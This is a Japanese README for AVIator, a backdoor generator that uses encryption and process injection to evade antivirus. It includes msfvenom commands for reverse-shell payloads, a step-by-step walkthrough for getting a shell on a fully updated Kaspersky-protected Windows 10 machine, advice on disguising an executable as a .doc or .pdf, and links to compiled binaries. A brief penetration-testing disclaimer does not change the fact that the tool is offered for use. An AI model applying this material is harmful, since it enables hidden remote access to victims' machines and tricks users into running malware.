
アンチウイルス回避プロジェクト
AviAtor を NETCore 5 に移植し、UI を更新しました
概要://name
AV: アンチウイルス
Ator: 剣士、錬金術師、科学者、魔術師、学者、そして技術者であり、時には無から物体を生み出す能力を持つ (https://en.wikipedia.org/wiki/Ator)
概要://purpose
AV|Ator は、暗号化技術とインジェクション技術を用いて AV 検知を回避するバックドア生成ユーティリティです。具体的には以下の通りです:
[https://attack.mitre.org/techniques/T1055/]:
ポータブル実行可能ファイルインジェクション – 悪意のあるコードをプロセスに直接書き込み(ディスク上のファイルなし)、追加コードまたはリモートスレッドの作成によって実行を呼び出す方法。注入されたコードの変位により、メモリ参照を再マッピングする機能が追加で必要となる。リフレクティブ DLL インジェクション(自己マッピング DLL をプロセスに書き込む)やメモリモジュール(プロセス書き込み時に DLL をマップ)などのバリエーションがアドレス再配置の問題を解決する。
スレッド実行ハイジャック – 悪意のあるコードや DLL へのパスをプロセスのスレッドに注入する手法。Process Hollowing と同様に、スレッドは最初にサスペンドされる必要がある。
アプリケーションは、3つの主要な入力項目があるフォームで構成されています(下のスクリーンショット参照):

重要: シェルコードは C# のバイト配列として提供する必要があります。
デフォルト値には notepad.exe (32bit) を実行するシェルコードが含まれています。このデモは、コードの形式を示すためのものです(msfvenom を使用すれば、-f csharp スイッチで簡単に生成できます。例: msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp)。
入力項目をすべて埋め、出力パスを選択した後、選択したオプションに従って実行可能ファイルが生成されます。
簡単に言えば、実行可能ファイルを「無害な」拡張子('pdf'、'txt' など)に見せかけるスプーフィングです。 例: ファイル "testcod.exe" は "tesexe.doc" として解釈されます。
一部の AV はスプーフィングそのものをマルウェアとして警告する場合があることに注意してください。
何かはお分かりですね :)
完全に更新された Kaspersky AV が動作する Windows 10 マシンでシェルを取得する
msfvenom でペイロードを作成
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
AVIator を以下の設定で使用
ターゲット OS アーキテクチャ: x64
インジェクション技術: スレッドハイジャック (シェルコードアーキテクチャ: x64、OS アーキテクチャ: x64)
ターゲットプロセス: explorer (デフォルトのまま)
攻撃マシンでリスナーを設定
被害マシンで生成された exe を実行
Windows:
プロジェクトをコンパイルするか、以下のフォルダから既にコンパイルされた実行可能ファイルをダウンロードしてください:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux:
お使いの Linux ディストリビューションに従って Mono をインストールし、バイナリをダウンロードして実行してください。
例 (kali):
root@kali# apt install mono-devel
root@kali# mono aviator.exe
暗号化手順について、Damon Mohammadbagher 氏に感謝します。
私はこのアプリを、ペネトレーションテストプロセスの厳しい課題を克服するために開発しました。このアプリはその目的のみに使用されるべきです。システムに対して使用する前に適切な許可を得ていることを確認し、不正な目的で使用しないでください。